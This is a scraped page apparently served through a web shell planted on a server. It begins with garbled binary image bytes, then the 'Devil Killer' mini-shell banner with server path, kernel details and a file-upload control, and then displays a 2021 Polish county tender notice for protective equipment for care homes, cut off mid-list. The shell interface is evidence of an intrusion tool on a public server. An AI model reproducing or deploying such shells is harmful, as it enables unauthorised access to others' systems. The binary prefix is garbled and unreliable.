JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210325/0002261502-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00022615 z dnia 2021-03-25</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup środków ochrony indywidualnej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Chełmski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 110198221</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Niepodległości 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chełm</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">82 562 75 01</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">82 562 75 10</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@powiatchelmski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://spchelm.bip.lubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup środków ochrony indywidualnej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a27b074d-8cab-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00022615</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-03-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004216/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.16 Zakup środków ochrony indywidualnej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Wsparcie działań związanych z przeciwdziałaniem skutkom rozprzestrzeniania się pandemii COVID-19 w domach pomocy społecznej” ze środków Programu Operacyjnego Wiedza Edukacja Rozwój finansowanego ze środków Europejskiego Funduszu Społecznego na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.powiatchelmski.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.powiatchelmski.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego, zgodnie z art. 61 ust. 1 ustawy, komunikacja między Zamawiającym a Wykonawcami, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy zamówień publicznych, zwanej dalej „Platformą”, dostępnej pod adresem: https://zamowienia.powiatchelmski.pl.3.	Platforma jest serwisem internetowym o charakterze zamkniętym, prowadzonym przez Zakład Elektronicznej Techniki Obliczeniowej ZETO Sp. z o.o. z siedzibą w Lublinie, ul. Diamentowa 2, 20-447 Lublin. Korzystanie z Platformy jest nieodpłatne. Instrukcja korzystania z Platformy znajduje się pod adresem: https://zamowienia.powiatchelmski.pl, w zakładce „Pomoc“.4.	Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z Platformy oraz zobowiązuje się korzystając z Platformy przestrzegać postanowień regulaminu oraz uznaje regulamin za wiążący.5.	Dokumenty związane z postępowaniem Zamawiający zamieszcza na Platformie w zakładce z przedmiotowym postępowaniem.8.	Zamawiający, zgodnie z art. 67 ustawy określa następujące wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej przy wykorzystaniu Platformy Zakupowej, tj.:1)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;2)	Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 10 , Mac Os x 10.4, Linux, lub ich nowsze wersje;3)	zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji obsługująca TLS 1.2 z wyjątkiem Internet Explorer;4)	włączona obsługa JavaScript;5)	zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.;6)	podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę certyfikatu używanego przez Wykonawcę.9.	Zamawiający, zgodnie z §11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452) podaje następujące informacje na temat specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych:1)	dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100 MB wformatach: .doc, .pdf, .zip, .docx, .xls, .xlsx, .rar, .7zip, .jpg, .jpeg, .png, .txt, .tiff, .xades, .sig,2)	informacje na temat kodowania i czasu odbioru danych: - plik załączony przez Wykonawcę na Platformie Zamówień Publicznych ZETO PZP i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert;</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://zamowienia.powiatchelmski.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: 1) Administratorem Pana/Pani danych osobowych jest: Powiat Chełmski, Plac Niepodległości 1, 22-100 Chełm, tel. 82 562 75 01, faks 82 562 75 10, e-mail: sekretariat@powiatchelmski.pl.2) Kontakt z Inspektorem Ochrony Danych: iod@powiatchelmski.pl, tel. 82 562 75 04.3) Pana/Pani dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym. Odbiorcami Pana/Pani danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r., poz. 2019 z późn. zm.), dalej „ustawa Pzp”. 5) Pana/Pani dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, a po tym czasie przez okres wskazany w przepisach prawa. 6) Obowiązek podania przez Pana/Panią danych osobowych bezpośrednio dotyczących Pana/Pani jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.7 ) W odniesieniu do Pana/Pani danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.8) Posiada Pan/Pani:− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pana/Pani dotyczących;− na podstawie art. 16 RODO prawo do sprostowania danych osobowych Pana/Pani dotyczących*;− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO**; − prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Pan/Pani uzna, że przetwarzanie danych osobowych dotyczących Pana/Pani narusza przepisy RODO.9) Nie przysługuje Panu/Pani:− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Pana/Pani jest art. 6 ust. 1 lit. c RODO.10) Przysługuje Panu/Pani prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pana/Pani danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa. Mając na celu wykonanie postanowień art. 28 ww. rozporządzenia Wykonawca złoży wraz z ofertą stosowne oświadczenie stanowiące załącznik nr 6 do SWZ.*Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.**Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OG.272.1.1.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 1: Dostawa środków ochrony indywidualnej dla Domu Pomocy Społecznej w Chojnie Nowym PierwszymPrzedmiotem zamówienia jest dostawa środków ochrony indywidualnej dla Domu Pomocy Społecznej w Chojnie Nowym Pierwszym.Zamówienie dotyczy projektu współfinansowanego ze środków Unii Europejskiej. Zadanie realizowane jest w ramach projektu pn. „Wsparcie działań związanych z przeciwdziałaniem skutkom rozprzestrzeniania się pandemii COVID-19 w domach pomocy społecznej” ze środków Programu Operacyjnego Wiedza Edukacja Rozwój finansowanego ze środków Europejskiego Funduszu Społecznego na lata 2014-2020.Lp.	Nazwa asortymentu planowanego do zakupu	Ilość1	Fartuch jednorazowy włókninowy stanowiący barierę dla cząstek, o dobrej przepuszczalności powietrza, wiązany z tyłu na troki, rękawy wykończone gumką, minimum 25 g/m² , rozmiar nie mniejszy niż LNorma PN EN 13795-2:2019.Deklaracja zgodności z wymaganiami dyrektywy 93/42/EWG.Oznakowanie znakiem CE.	do 1 300 sztuk2	Maska z filtrem co najmniej FFP2, pięciowarstwowa, płaska bez zaworu, posiadająca gumkę umożliwiającą założenie maseczki o uszy. W części środkowej mają posiadać zakładki (harmonijka) umożliwiające dopasowanie maseczki do kształtu twarzy – zakrycie nosa, ust i brody. W jednej krawędzi mają posiadać wzmocnienie umożliwiające dopasowanie maseczki do nosa zapewniające szczelność przylegania.Zgodność z normami PN- EN 149:2001+A1:2019Deklaracja zgodności z wymaganiami dyrektywy 93/42/EWGEN 14683 w zakresie Typ I, II, IIR.Oznakowanie znakiem CE.	do 200 sztuk3.	Rękawice nitrylowe bezpudrowe rozm. M po 100 szt. w opakowaniu.Pasują na lewą i prawą rękę;Nie wykazują właściwości alergizujących;Ochrona przed wirusami oraz krwiopochodnymi patogenami;Wykończenie mankietu – rolowany brzeg;Norma PN-EN 455-1:2004	do 115 opakowań4.	Rękawice nitrylowe bezpudrowe rozm. L po 100 szt. w opakowaniu.Pasują na lewą i prawą rękę;Nie wykazują właściwości alergizujących;Ochrona przed wirusami oraz krwiopochodnymi patogenami;Wykończenie mankietu – rolowany brzeg;Norma PN-EN 455-1:2004	do 30 opakowań5.	Rękawice nitrylowe bezpudrowe rozm. S po 100 szt. w opakowaniu.Pasują na lewą i prawą rękę.Nie wykazują właściwości alergizujących.Ochrona przed wirusami oraz krwiopochodnymi patogenami;Wykończenie mankietu – rolowany brzeg.Norma PN- EN 455-1:2004	do 20 opakowań6	Maseczki jednorazowe chirurgiczne, trójwarstwowe, posiadające gumkę umożliwiającą założenie maseczki o uszy lub z elastycznym paskiem do zamocowania na uszach( nie wiązane). W części środkowej mają posiadać zakładki (harmonijka) umożliwiające dopasowanie maseczki do kształtu twarzy – zakrycie nosa, ust i brody. W jednej krawędzi mają posiadać wzmocnienie umożliwiające dopasowanie maseczki do nosa zapewniające szczelność przylegania.Powinny spełniać zgodność z normą PN-EN 14683, oznakowanie znakiem CE.	do 4000 sztuk7.	Ochraniacze na obuwie jednorazowe, antypoślizgowe, ściągane gumką. Norma PN-EN 14126:2005 do 1000 sztuk8.	Czepek ochronny typu beret flizelinowy, zakończony gumką.Norma PN-EN 14126:2005	do 500 sztuk9.	Płyn do dezynfekcji rąk, opakowanie 5 litrów, o przedłużonym działaniu bakteriobójczym, działającym na wirusy, w tym wirusa SARS-Cov -2, bakterie, grzyby, prątki gruźlicy, zawierający glicerynę, gotowy do użycia.Normy: PN-EN 12054:1995, PN-EN 1500:2002, PN-EN 13697:2002.Okres ważności minimum 2 lata.Posiada atest PZH. do 20 opakowań10.	Płyn do dezynfekcji powierzchni małych i dużych, np. blaty, łóżka, fotele, podłogi; nadający się do dezynfekcji materiałów obiciowych oraz wyrobów z tworzywa ABS, szkła, stali szlachetnej oraz aluminium, niklu i chromu, nie wymagający rozcieńczania. Działający na bakterie, grzyby, prątki gruźlicy, wirusy, w tym wirus Sars-Cov -2.Opakowanie 5 litrów. do 20 opakowań11.	Kombinezon jednorazowy z kapturem włókninowy, zapinany na zamek błyskawiczny, 100% polipropylen, gramatura 50 g/m2, gumka ściągająca w pasieNorma PN – EN ISO 13688: 2013-12 do 100 sztuk12.	Testy na obecność wirusa COVID-19.Test wykrywający antygen SARS – CoV-2 z wymazu z nosogardzieli. Certyfikat CE. Metoda kasetkowa immunochromatograficzna, bez konieczności użycia czytnika. W zestawie: wymazówki kłaczkowe do poboru z nosogardzieli, kontrola dodatnia i ujemna, statyw na próbówki.	do 60 sztukZamawiający zastrzega, że ilości towaru są ilościami szacunkowymi. Zamawiający zastrzega sobie możliwość, w czasie trwania umowy, zmniejszenia ilości zakupionego towaru, nie mniej jednak niż do 80% ilości wskazanych w formularzu cenowym. Jeżeli w wyniku takiej sytuacji wynagrodzenie należne Wykonawcy ulegnie odpowiedniemu pomniejszeniu Wykonawcy nie przysługują żadne roszczenia wobec Zamawiającego z tego tytułu.Dostarczony przedmiot zamówienia będzie fabrycznie nowy, pierwszego gatunku, wolny od wad fizycznych i prawnych, będzie spełniać wymogi określone obowiązującym prawem oraz normy wskazane w SWZ, został dopuszczony do obrotu handlowego i posiada wymagane prawem atesty i pozwolenia, a także ważne dokumenty, stwierdzające dopuszczenie do stosowania na terenie Polski oraz spełnia wszystkie wymogi dopuszczające do użytkowania w jednostkach służby zdrowia.Dostarczony towar musi posiadać aktualny termin przydatności do użycia, nie krótszy niż 24 miesiące. Wykonawca zobowiązany jest do właściwego zabezpieczenia przedmiotu zamówienia na czas przewozu i do jego dostarczenia do siedziby jednostki organizacyjnej Zamawiającego tj. Domu Pomocy Społecznej w Chojnie Nowym Pierwszym, Chojno Nowe Pierwsze 118, 22-130 Siedliszcze. Odpowiedzialność za ewentualne szkody powstałe w trakcie dostawy ponosi Wykonawca. Dostawa towaru obejmuje również jego rozładunek pod adresem jednostki organizacyjnej Zamawiającego tj. Domu Pomocy Społecznej w Chojnie Nowym Pierwszym.Transport, dostawa i rozładunek realizowane będą na koszt i ryzyko Wykonawcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33600000-6 - Produkty farmaceutyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">18424300-0 - Rękawice jednorazowe</p> <p class="mb-0">33190000-8 - Różne urządzenia i produkty medyczne</p> <p class="mb-0">33631600-8 - Środki antyseptyczne i dezynfekcyjne</p> <p class="mb-0">35113410-6 - Odzież ochrony biologicznej i chemicznej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-04-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejszą ofertą będzie oferta, która przedstawianajkorzystniejszy bilans kryteriów: „cena” i „termin realizacji zamówienia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Najkorzystniejszą ofertą będzie oferta, która przedstawianajkorzystniejszy bilans kryteriów: „cena” i „termin realizacji zamówienia” <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 2: Dostawa środków ochrony indywidualnej dla Domu Pomocy Społecznej w KaniemPrzedmiotem zamówienia jest dostawa środków ochrony indywidualnej dla Domu Pomocy Społecznej w Kaniem.	Zamówienie dotyczy projektu współfinansowanego ze środków Unii Europejskiej. Zadanie realizowane jest w ramach projektu pn. „Wsparcie działań związanych z przeciwdziałaniem skutkom rozprzestrzeniania się pandemii COVID-19 w domach pomocy społecznej” ze środków Programu Operacyjnego Wiedza Edukacja Rozwój finansowanego ze środków Europejskiego Funduszu Społecznego na lata 2014-2020.Lp.	Nazwa asortymentu planowanego do zakupu	Ilość 1	Kombinezon jednorazowy ochronny KAT II Typ ochrony 3-4/B wykonany z polietylenu i polipropylenu o gramaturze 60 g/m², posiada właściwości antyseptyczne, charakteryzuje się dużą lekkością, w kolorze białym z niebieskimi paskami, wysokość 183 cm szerokość w pasie 58 cm kombinezon spełnia normy PN-EN 14126:2005, PN-EN 1412, PN-EN 1703,3, PN-EN 1149-5, PN-EN 13034, produkt posiada znak CE.	do 200 sztuk 2	Maska z filtrem FFP3, skuteczność filtracji 99%, posiadająca gumkę umożliwiającą założenie maseczki o uszy. Wykonana z igłowanej włókniny poliestrowej, elementy dodatkowe: zawór wydechowy, zacisk nosowy, uszczelka nosowa z pianki polietylenowej, zapinki dwóch taśm nagłowia, wielokrotnego użytku, w kolorze białym, 